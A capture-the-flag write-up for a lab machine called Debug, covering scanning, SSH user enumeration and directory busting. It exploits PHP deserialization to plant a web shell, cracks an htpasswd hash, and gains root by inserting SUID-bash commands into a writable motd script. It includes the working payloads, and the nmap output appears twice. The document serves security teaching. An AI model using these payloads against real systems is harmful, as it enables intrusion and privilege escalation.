Machine Link: Debug
Starting off with nmap
┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
| 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds┌──(kali㉿kali)-[~]
└─$ nmap -T4 -A -v 10.10.69.115
Starting Nmap 7.91 ( https://nmap.org ) at 2023-09-23 08:02 EDT
NSE: Loaded 153 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating NSE at 08:02
Completed NSE at 08:02, 0.00s elapsed
Initiating Ping Scan at 08:02
Scanning 10.10.69.115 [2 ports]
Completed Ping Scan at 08:02, 0.44s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 08:02
Completed Parallel DNS resolution of 1 host. at 08:02, 0.00s elapsed
Initiating Connect Scan at 08:02
Scanning 10.10.69.115 [1000 ports]
Discovered open port 22/tcp on 10.10.69.115
Discovered open port 80/tcp on 10.10.69.115
Connect Scan Timing: About 32.68% done; ETC: 08:03 (0:01:04 remaining)
Increasing send delay for 10.10.69.115 from 0 to 5 due to max_successful_tryno increase to 5
Completed Connect Scan at 08:03, 62.64s elapsed (1000 total ports)
Initiating Service scan at 08:03
Scanning 2 services on 10.10.69.115
Completed Service scan at 08:03, 6.88s elapsed (2 services on 1 host)
NSE: Script scanning 10.10.69.115.
Initiating NSE at 08:03
Completed NSE at 08:03, 19.40s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 1.72s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Nmap scan report for 10.10.69.115
Host is up (0.43s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.10 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 44:ee:1e:ba:07:2a:54:69:ff:11:e3:49:d7:db:a9:01 (RSA)
| 256 8b:2a:8f:d8:40:95:33:d5:fa:7a:40:6a:7f:29:e4:03 (ECDSA)
|_ 256 65:59:e4:40:2a:c2:d7:05:77:b3:af:60:da:cd:fc:67 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
NSE: Script Post-scanning.
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Initiating NSE at 08:03
Completed NSE at 08:03, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 92.42 seconds
We find two ports; 22 (ssh
) and 80 (http
). Lets enumerate ssh
first through the version that it is exposing and lets see if there’s an exploit to it.
Searching it up shows that it is vulnerable to username enumeration so lets launch metasploit
and see if it can do something about it.
msf6 > search port:22 ssh enum
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 auxiliary/scanner/ssh/cerberus_sftp_enumusers 2014-05-27 normal No Cerberus FTP Server SFTP Username Enumeration
1 auxiliary/scanner/ssh/ssh_enumusers normal No SSH Username Enumeration
Interact with a module by name or index. For example info 1, use 1 or use auxiliary/scanner/ssh/ssh_enumusers
msf6 > use 1
msf6 auxiliary(scanner/ssh/ssh_enumusers) >
Searching up it shows that there is a ssh_enumusers
scanner available so lets use it.
msf6 auxiliary(scanner/ssh/ssh_enumusers) > set USER_FILE /usr/share/legion/wordlists/ssh-user.txt
USER_FILE => /usr/share/legion/wordlists/ssh-user.txt
msf6 auxiliary(scanner/ssh/ssh_enumusers) > run
[*] 10.10.69.115:22 - SSH - Using malformed packet technique
[*] 10.10.69.115:22 - SSH - Starting scan
[+] 10.10.69.115:22 - SSH - User 'root' found
[!] No active DB -- Credential data will not be saved!
[+] 10.10.69.115:22 - SSH - User 'sysop' found
[+] 10.10.69.115:22 - SSH - User 'admin' found
[+] 10.10.69.115:22 - SSH - User 'admnistrator' found
[+] 10.10.69.115:22 - SSH - User 'superuser' found
[*] Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
Using the usual ssh-user.txt
file present in Kali Linux it found all of these users to be the part of this machine. Well, that’s a little too much.
Checking out the port 80 it gives the typical Apache2 Ubuntu Default Page.
So we don’t have the password for ssh
and the http
port is just showing the default config page. What else can we do now? Start brute forcing things, right? Lets start with directory busting then.
┌──(kali㉿kali)-[~/dirsearch]
└─$ dirsearch -u http://10.10.69.115/ -t 100
_|. _ _ _ _ _ _|_ v0.4.2
(_||| _) (/_(_|| (_| )
Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 100 | Wordlist size: 10927
Output File: /home/kali/.dirsearch/reports/10.10.69.115/-_23-09-23_08-39-55.txt
Error Log: /home/kali/.dirsearch/logs/errors-23-09-23_08-39-55.log
Target: http://10.10.69.115/
[08:39:56] Starting:
[08:40:20] 403 - 277B - /.htaccess.sample
[08:40:20] 403 - 277B - /.htaccess_sc
[08:40:20] 403 - 277B - /.htaccessBAK
[08:40:20] 403 - 277B - /.htaccess.orig
[08:40:20] 403 - 277B - /.htaccess_orig
[08:40:20] 403 - 277B - /.htaccess.save
[08:40:20] 403 - 277B - /.htaccessOLD2
[08:40:20] 403 - 277B - /.htaccess_extra
[08:40:20] 403 - 277B - /.htm
[08:40:21] 403 - 277B - /.htpasswds
[08:40:21] 403 - 277B - /.html
[08:40:21] 403 - 277B - /.htaccess.bak1
[08:40:21] 403 - 277B - /.ht_wsr.txt
[08:40:21] 403 - 277B - /.htaccessOLD
[08:40:21] 403 - 277B - /.httr-oauth
[08:40:22] 403 - 277B - /.htpasswd_test
[08:40:23] 403 - 277B - /.php
[08:40:24] 403 - 277B - /.php3
[08:40:57] 301 - 313B - /backup -> http://10.10.69.115/backup/
[08:40:57] 200 - 2KB - /backup/
[08:41:19] 200 - 11KB - /index.html
[08:41:19] 200 - 6KB - /index.php
[08:41:19] 200 - 6KB - /index.php/login/
[08:41:22] 301 - 317B - /javascript -> http://10.10.69.115/javascript/
[08:41:43] 200 - 2KB - /readme.md
[08:41:46] 403 - 277B - /server-status/
[08:41:48] 403 - 277B - /server-status
Task Completed
Directory Busting through dirsearch
did come up with some directories. Lets look into the most interesting one that is /index.php/login/
This page brings up a submit form. Throwing up XSS and SQL payloads won’t work. So lets dig deep and look for its code.
Viewing this page’s source will only give some useless HTML code. Lets find this index.php
file somewhere else.
In our Directory Busting, /backup/
folder was found so lets see if it has the index.php
file and it indeed has the backup file of it as index.php.bak
.
<?php
class FormSubmit {
public $form_file = 'message.txt';
public $message = '';
public function SaveMessage() {
$NameArea = $_GET['name'];
$EmailArea = $_GET['email'];
$TextArea = $_GET['comments'];
$this-> message = "Message From : " . $NameArea . " || From Email : " . $EmailArea . " || Comment : " . $TextArea . "\n";
}
public function __destruct() {
file_put_contents(__DIR__ . '/' . $this->form_file,$this->message,FILE_APPEND);
echo 'Your submission has been successfully saved!';
}
}
// Leaving this for now... only for debug purposes... do not touch!
$debug = $_GET['debug'] ?? '';
$messageDebug = unserialize($debug);
$application = new FormSubmit;
$application -> SaveMessage();
?>
Code gives a hint with the comments. So that must be where we should go further from. And as the description of machine said, we have to do PHP Deserialization so now is the time to do it.
The PHP code takes the name, email and comment passed in the GET by a form on the page. It uses those values to build a message that gets written to the file message.txt
when the object is destructed. Lets test it out a little first by opening the following URL.
http://debug.thm/index.php?name=test&email=test&comments=test&select=1&checkbox=1
Then visiting this URL will validate our understanding.
Now the part of code that has a comment on it tells us that if the URL contains a debug
parameter, it will deserialize its content. That meant we could serialize an object of the class FormSubmit
with the file and message we wanted. The server would then deserialize it, and when it would reach the end of the PHP block, the object would be out of scope and the class destructor would be called and our message would be written to the file of our choice.
So lets build a small code to fill in our shell.
<?php
class FormSubmit{
public $form_file = 'test.php';
public $message = '<?php system($_GET["cmd"]); ?>';
}
$obj = new FormSubmit();
echo serialize($obj);
?>
Testing it out it gives us the serialized object.
└─$ php testing.php
O:10:"FormSubmit":2:{s:9:"form_file";s:8:"test.php";s:7:"message";s:30:"<?php system($_GET["cmd"]); ?>";}
Now lets URL Encode it through CyberChef
or any other URL Encoder and just use it with the debug
parameter.
Lets visit the test.php
file along with a command to see if our payload worked.
And it did. Running ls -al
gives us a file called .htpasswd
.
Looking into the file we see some goody good credentials.
The password seems like a hash so just crack it out.
└─$ john htpasswd.hash
Created directory: /home/kali/.john
Warning: detected hash type "md5crypt", but the string is also recognized as "md5crypt-long"
Use the "--format=md5crypt-long" option to force loading these as that type instead
Using default input encoding: UTF-8
Loaded 1 password hash (md5crypt, crypt(3) $1$ (and variants) [MD5 128/128 AVX 4x3])
Will run 2 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, almost any other key for status
Warning: Only 2 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 20 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 15 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 23 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 21 candidates buffered for the current salt, minimum 24 needed for performance.
Warning: Only 13 candidates buffered for the current salt, minimum 24 needed for performance.
Almost done: Processing the remaining buffered candidate passwords, if any.
Warning: Only 14 candidates buffered for the current salt, minimum 24 needed for performance.
Proceeding with wordlist:/usr/share/john/password.lst, rules:Wordlist
jamaica (james)
1g 0:00:00:00 DONE 2/3 (2023-09-23 10:57) 11.11g/s 20288p/s 20288c/s 20288C/s francine..me
Use the "--show" option to display all of the cracked passwords reliably
Session completed
Saving the collected hash in a htpasswd.hash
file and running it through John The Ripper
gives us the password. This means its SSH time!
┌──(kali㉿kali)-[~]
└─$ ssh james@10.10.69.115 255 ⨯
The authenticity of host '10.10.69.115 (10.10.69.115)' can't be established.
ECDSA key fingerprint is SHA256:JCUiGJ9gC+EZEJeudS9yMKLVlE7MtpS2rolJudHcCbQ.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.69.115' (ECDSA) to the list of known hosts.
james@10.10.69.115's password:
Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.15.0-45-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
439 packages can be updated.
380 updates are security updates.
Last login: Wed Mar 10 18:36:58 2021 from 10.250.0.44
james@osboxes:~$ ls
Desktop Downloads Music Pictures Templates Videos
Documents examples.desktop Note-To-James.txt Public user.txt
james@osboxes:~$ cat user.txt
7e37c84a66cc40b1c6bf700d08d28c20
SSHing into the machine and opening user.txt
gives us the first flag. Time to go to root now.
james@osboxes:~$ cat Note-To-James.txt
Dear James,
As you may already know, we are soon planning to submit this machine to THM's CyberSecurity Platform! Crazy... Isn't it?
But there's still one thing I'd like you to do, before the submission.
Could you please make our ssh welcome message a bit more pretty... you know... something beautiful :D
I gave you access to modify all these files :)
Oh and one last thing... You gotta hurry up! We don't have much time left until the submission!
Best Regards,
root
Another file Note-To-James.txt
is present inside the same directory which tells us the next steps. According to this note, we should be able to modify the Message Of The Day (motd
).
james@osboxes:~$ ls -l /etc/update-motd.d/
total 28
-rwxrwxr-x 1 root james 1220 Mar 10 2021 00-header
-rwxrwxr-x 1 root james 0 Mar 10 2021 00-header.save
-rwxrwxr-x 1 root james 1157 Jun 14 2016 10-help-text
-rwxrwxr-x 1 root james 97 Dec 7 2018 90-updates-available
-rwxrwxr-x 1 root james 299 Jul 22 2016 91-release-upgrade
-rwxrwxr-x 1 root james 142 Dec 7 2018 98-fsck-at-reboot
-rwxrwxr-x 1 root james 144 Dec 7 2018 98-reboot-required
-rwxrwxr-x 1 root james 604 Nov 5 2017 99-esm
We see that we have full rights to modify any of the file inside motd
. Lets edit the very first file.
#!/bin/sh
cp /bin/bash /tmp/
chmod u+s /tmp/bash
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
# Fall back to using the very slow lsb_release utility
DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi
printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"
I added two lines right beneath the shebang in the first line. Remember to use nano
to edit the files since its the least painful of the command line text editors to exist.
Now just logout and SSH into the machine again to get your Message Of The Day (motd
) and see if our added commands our gonna work to get root.
james@osboxes:~$ id
uid=1001(james) gid=1001(james) groups=1001(james)
james@osboxes:~$ /tmp/bash -p
bash-4.3# id
uid=1001(james) gid=1001(james) euid=0(root) groups=1001(james)
Now that we login again and run the /tmp/bash -p
we see that we went from 1001 to 0 real quick. We are at the root!
bash-4.3# ls
Desktop Documents Downloads examples.desktop Music Note-To-James.txt Pictures Public Templates user.txt Videos
bash-4.3# cd ..
bash-4.3# ls
james lost+found
bash-4.3# ls -al
total 28
drwxr-xr-x 4 root root 4096 Mar 10 2021 .
drwxr-xr-x 24 root root 4096 Feb 28 2019 ..
drwx------ 17 james james 4096 Mar 10 2021 james
drwx------ 2 root root 16384 Feb 28 2019 lost+found
bash-4.3# cd ..
bash-4.3# ls
bin boot cdrom dev etc home initrd.img initrd.img.old lib lib64 lost+found media mnt opt proc root run sbin snap srv sys tmp usr var vmlinuz
bash-4.3# cd root
bash-4.3# ls
root.txt
bash-4.3# cat root.txt
3c8c3d0fe758c320d158e32f68fabf4b
Navigating a little more just leads us to the root flag.
Top comments (0)